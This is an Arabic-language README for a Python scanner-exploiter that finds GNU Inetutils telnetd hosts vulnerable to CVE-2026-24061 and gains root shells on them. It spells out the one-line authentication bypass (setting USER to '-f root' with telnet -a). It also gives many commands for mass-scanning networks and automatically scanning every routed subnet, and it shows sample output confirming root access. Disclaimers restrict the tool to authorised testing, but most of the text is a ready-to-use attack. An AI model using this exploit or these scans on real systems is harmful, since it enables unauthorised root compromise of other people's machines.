
# ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة.
أداة مبنية بلغة Python لفحص واستغلال ثغرة CVE-2026-24061 في خدمات telnetd الخاصة بـ GNU Inetutils. تقوم هذه الأداة بفحص عناوين IP أو الشبكات بحثًا عن خدمات telnetd الضعيفة التي تسمح بتجاوز المصادقة مما يؤدي إلى الوصول إلى صلاحيات الجذر (root shell).
هذا البرنامج مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط.
تم تطوير هذا التطبيق لأغراض تعليمية فقط لتوضيح الثغرات الأمنية وللمساعدة في الاختبارات الأمنية والأبحاث المصرح بها.
هذا البرنامج مقدم "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق، والملاءمة لغرض معين، وعدم التعدي على الحقوق. لا يضمن المؤلفون والمساهمون أن البرنامج سيكون خاليًا من الأخطاء أو آمنًا أو فعالاً. قد يحتوي البرنامج على أخطاء برمجية أو عيوب أخرى.
تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يتحمل المؤلفون أو المساهمون أو الموزعون لهذا البرنامج أي مسؤولية عن أي أضرار أو خسائر أو عواقب قانونية ناتجة عن استخدام أو إساءة استخدام أو عدم القدرة على استخدام هذا البرنامج.
يجب استخدام هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد يؤدي إلى ملاحقة جنائية.
لا يضمن المؤلفون عدم:
باستخدامك لهذا البرنامج، فإنك تقر بأنك قرأت وفهمت ووافقت على الالتزام بهذه الشروط. إذا كنت لا توافق، فلا تستخدم هذا البرنامج.
تم التطوير بواسطة: Cuma KURT
البريد الإلكتروني: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: تسمح خدمة telnetd الخاصة بـ GNU Inetutils حتى الإصدار 2.7 بتجاوز المصادقة عن بُعد عبر قيمة -f root لمتغير البيئة USER.
درجة CVSS: 9.8 (حرجة)
المرجع: NVD CVE-2026-24061
telnet (مثبت مسبقًا عادةً على Linux/macOS)pip3 install -r requirements.txt
ملاحظة: معظم التبعيات جزء من المكتبة القياسية للغة Python. تعمل الأداة مباشرة مع Python 3.6+.
# فحص عنوان IP واحد
python3 tscan.py 192.168.1.1
# فحص شبكة CIDR
python3 tscan.py 192.168.1.0/24
# الفحص بمنفذ مخصص
python3 tscan.py -p 2323 192.168.1.1
# فحص أهداف من ملف
python3 tscan.py targets.txt
# فحص عناوين IP متعددة
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# فحص شبكات CIDR متعددة
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# زيادة عدد الخيوط لفحص أسرع (100 خيط)
python3 tscan.py -t 100 192.168.1.0/24
# زيادة المهلة الزمنية للشبكات البطيئة
python3 tscan.py --timeout 10 192.168.1.0/24
# الجمع بين الاثنين لفحص الشبكات الكبيرة
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام
python3 tscan.py --auto
# أو باستخدام الصيغة المختصرة:
python3 tscan.py -a
# الاكتشاف التلقائي بمنفذ مخصص
python3 tscan.py --auto -p 2323
# أو:
python3 tscan.py -a -p 2323
# الاكتشاف التلقائي بعدد خيوط مرتفع
python3 tscan.py --auto -t 200
# أو:
python3 tscan.py -a -t 200
ملاحظة: يقرأ وضع --auto جدول توجيه النظام باستخدام أمر ip route list أو route -n ويفحص جميع الشبكات الفرعية المكتشفة تلقائيًا.
# مثال 1: فحص سريع للشبكة المحلية
python3 tscan.py 192.168.1.0/24
# مثال 2: فحص سريع بتزامن عالٍ
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# مثال 3: فحص منفذ telnet غير قياسي
python3 tscan.py -p 2323 192.168.1.0/24
# مثال 4: اكتشاف وفحص جميع الشبكات الفرعية المحلية تلقائيًا
python3 tscan.py --auto
# أو:
python3 tscan.py -a
# مثال 5: الاكتشاف التلقائي بإعدادات مخصصة
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# أو:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets عنوان (عناوين) IP أو شبكة (شبكات) CIDR أو مسار (مسارات) ملفات تحتوي على الأهداف
options:
-h, --help عرض رسالة المساعدة هذه والخروج
-p, --port PORT منفذ Telnet للفحص (الافتراضي: 23)
-t, --threads THREADS عدد الخيوط المتزامنة (الافتراضي: 50)
--timeout TIMEOUT مهلة الاتصال بالثواني (الافتراضي: 5)
-v, --verbose إخراج تفصيلي
-a, --auto اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام (route -n أو ip route list)
أنشئ ملفًا نصيًا بهدف واحد في كل سطر:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
الأسطر التي تبدأ بـ # تُعتبر تعليقات ويتم تجاهلها.
توفر الأداة:
تقدم فوري: يعرض النتائج فور اكتشافها
[!] - مضيف ضعيف[~] - المنفذ مفتوح ولكن غير ضعيفتقرير الملخص: يتضمن:
[*] بدء الفحص على 256 هدفًا...
[*] المنفذ: 23، الخيوط: 50، المهلة: 5 ثوانٍ
[*] التقدم: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | مفتوح: 2 | ضعيف: 1
[!] 192.168.1.100:23 - ضعيف
[*] التقدم: [████████████████████████████████████] 100.0% (256/256) | مفتوح: 3 | ضعيف: 1
[+] اكتمل الفحص: تم فحص 256/256 هدفًا
======================================================================
ملخص نتائج الفحص
======================================================================
خدمات telnet المكتشفة: 3
المضيفون الضعفاء: 1
[!] المضيفون الضعفاء:
● 192.168.1.100:23
المخرجات: uid=0(root) gid=0(root) groups=0(root)...
[~] خدمات telnet المكتشفة ولكنها غير ضعيفة:
● 192.168.1.101:23
● 192.168.1.102:23
[*] اكتمل الفحص في 12.34 ثانية
USER="-f root"telnet -aتسمح الثغرة بتجاوز المصادقة عن طريق ضبط متغير البيئة USER على -f root:
USER="-f root" telnet -a TARGET_IP [PORT]
يؤدي هذا إلى تفسير telnetd لمتغير USER كعلامة (flag)، متجاوزًا المصادقة ومانحًا وصول الجذر.
telnetip route list أو route -nقم بتثبيت عميل telnet:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# مثبت مسبقًا عادةً
--timeout 10هذه الأداة مخصصة لـ:
لا تستخدم هذه الأداة من أجل:
هذا البرنامج برنامج حر: يمكنك إعادة توزيعه و/أو تعديله بموجب شروط رخصة جنو العمومية العامة كما نشرتها مؤسسة البرمجيات الحرة، إما الإصدار 3 من الرخصة، أو (حسب اختيارك) أي إصدار لاحق.
يتم توزيع هذا البرنامج على أمل أن يكون مفيدًا، ولكن دون أي ضمان؛ حتى دون الضمان الضمني لـ القابلية للتسويق أو الملاءمة لغرض معين. راجع رخصة جنو العمومية العامة لمزيد من التفاصيل.
يجب أن تكون قد استلمت نسخة من رخصة جنو العمومية العامة مع هذا البرنامج. إذا لم يكن الأمر كذلك، فانظر https://www.gnu.org/licenses/.
انظر إلى ملف LICENSE للحصول على النص الكامل لرخصة جنو العمومية العامة الإصدار 3.0.
المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.
استخدمها على مسؤوليتك الخاصة. تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يضمن المؤلفون دقة أو أمان أو وظائف هذا البرنامج. البرنامج مقدم "كما هو" دون أي ضمان من أي نوع.
تم تطوير هذا التطبيق لأغراض تعليمية فقط. باستخدامك لهذا البرنامج، فإنك تقر بأن:
إذا كنت لا توافق على هذه الشروط، فلا تستخدم هذا البرنامج.